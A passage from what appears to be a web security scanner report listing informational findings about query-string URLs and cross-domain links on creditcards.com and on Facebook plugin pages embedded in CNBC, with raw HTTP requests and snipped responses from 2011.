http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1

The response contains the following links to other domains:

http://112.2o7.net/b/ss/ccardsccdc-us/1/H.15.1--NS/0
http://www.omniture.com/

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:07 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705400759134443&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3104
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:07 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://112.2o7.net/b/ss/ccardsccdc-us/1/H.15.1--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

15.97. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1351d47b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130

The response contains the following link to another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/IqATM6kdESm.css

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1351d47b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

15.98. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/H7He8TCHOS8.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/rtDNAXiTAA6.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js

Request

Response

15.99. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg
http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif
http://external.ak.fbcdn.net/safe_image.php?d=7bce56e538a241cdc07c4eaed46d529c&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F_News%2F_SLIDESHOWS%2FVancouverHockeyRiots%2FCNBC_vancouver_hockey_riot_Cover.jpg
http://external.ak.fbcdn.net/safe_image.php?d=9cac76b751bd27264ad13fece17c09a6&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_FORECLOSURE%2Fforeclosure_sign2_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b1c5d00e8642cae48bd7f89c89abc4d9&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__TECHNOLOGY%2F_INTERNET%2Ffacebook_200.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css
http://www.cnbc.com/id/43378490
http://www.cnbc.com/id/43395857
http://www.cnbc.com/id/43396080
http://www.cnbc.com/id/43411328
http://www.cnbc.com/id/43412479
http://www.cnbc.com/id/43412781
http://www.cnbc.com/id/43425237

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.32
X-Cnection: close
Date: Thu, 16 Jun 2011 18:27:21 GMT
Content-Length: 13455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1343b3567f4f9be0"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43395857" title="US Housing Crisis Is Now Worse Than Great Depression" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=9cac76b751bd27264ad13fece17c09a6&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_FORECLOSURE%2Fforeclosure_sign2_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43395857" target="_top">US Housing Crisis Is Now Worse Than Great Depression</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_37aef54b317b1006"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43396080" title="Gold to Reach $5,000 Due to Supply Shortage: Report" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43396080" target="_top">Gold to Reach $5,000 Due to Supply Shortage: Report</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_40a093e572f6dab1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412479" title="New Book With ...F... Word in Title is Now Pulp Fiction" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412479" target="_top">New Book With ...F... Word in Title is Now Pulp Fiction</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1e8406eb5b37cd32"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412781" title="Nearly Half of US Thinks New Recession is Coming: Poll" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412781" target="_top">Nearly Half of US Thinks New Recession is Coming: Poll</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_75635bcebfe9f629"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43378490" title="Facebook IPO Valuation Could Top $100 Billion: Sources" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b1c5d00e8642cae48bd7f89c89abc4d9&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__TECHNOLOGY%2F_INTERNET%2Ffacebook_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43378490" target="_top">Facebook IPO Valuation Could Top $100 Billion: Sources</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4f24ec2f35cdcdaa"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43411328" title="Stocks End Sharply Lower; Dow Skids 1.5%" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43411328" target="_top">Stocks End Sharply Lower; Dow Skids 1.5%</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4a3b8e99f62ac059"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43425237" title="http://www.cnbc.com/id/43425237" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=7bce56e538a241cdc07c4eaed46d529c&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F_News%2F_SLIDESHOWS%2FVancouverHockeyRiots%2FCNBC_vancouver_hockey_riot_Cover.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43425237" target="_top">http://www.cnbc.com/id/43425237</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

15.100. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg
http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif
http://external.ak.fbcdn.net/safe_image.php?d=8050391a7fdf877236dced9c97f78f34&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_97_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=9e32027a1499cb50a819be76e4092866&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_HOME_TYPES%2Fvegas_homes.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b1ed8a9455f000768c480c95f08aa03d&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FG%2Fgross_bill_DC_200.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css
http://www.cnbc.com/id/43378973
http://www.cnbc.com/id/43392976
http://www.cnbc.com/id/43396080
http://www.cnbc.com/id/43410052
http://www.cnbc.com/id/43411328
http://www.cnbc.com/id/43412479
http://www.cnbc.com/id/43412781

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.138.25
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:08 GMT
Content-Length: 13471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4ca5a46765c2d757"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43378973" title="US Is in Even Worse Shape Financially Than Greece: Gross" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b1ed8a9455f000768c480c95f08aa03d&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FG%2Fgross_bill_DC_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43378973" target="_top">US Is in Even Worse Shape Financially Than Greece: Gross</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7d31fefd844f4550"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43396080" title="Gold to Reach $5,000 Due to Supply Shortage: Report" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43396080" target="_top">Gold to Reach $5,000 Due to Supply Shortage: Report</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1f1381c334707ab8"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43392976" title="Obama: If Debt Limit Not Raised, Financial Crisis Possible" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=8050391a7fdf877236dced9c97f78f34&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_97_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43392976" target="_top">Obama: If Debt Limit Not Raised, Financial Crisis Possible</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_a3f9853c7c28fe7"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412479" title="New Book With ...F... Word in Title is Now Pulp Fiction" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412479" target="_top">New Book With ...F... Word in Title is Now Pulp Fiction</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_541b0d5dee039864"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412781" title="Nearly Half of US Thinks New Recession is Coming: Poll" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412781" target="_top">Nearly Half of US Thinks New Recession is Coming: Poll</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5bbe79980f998fc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43411328" title="Stocks End Sharply Lower; Dow Skids 1.5%" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43411328" target="_top">Stocks End Sharply Lower; Dow Skids 1.5%</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_50015e2df427615a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43410052" title="Foreigners Make Run on US Housing Market" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=9e32027a1499cb50a819be76e4092866&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_HOME_TYPES%2Fvegas_homes.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43410052" target="_top">Foreigners Make Run on US Housing Market</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

15.101. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css
http://www.cnbc.com/id/43104151
http://www.cnbc.com/id/43129781
http://www.cnbc.com/id/43131763
http://www.cnbc.com/id/43134077
http://www.cnbc.com/id/43136927
http://www.cnbc.com/id/43149634
http://www.cnbc.com/id/43151440

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

15.102. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg
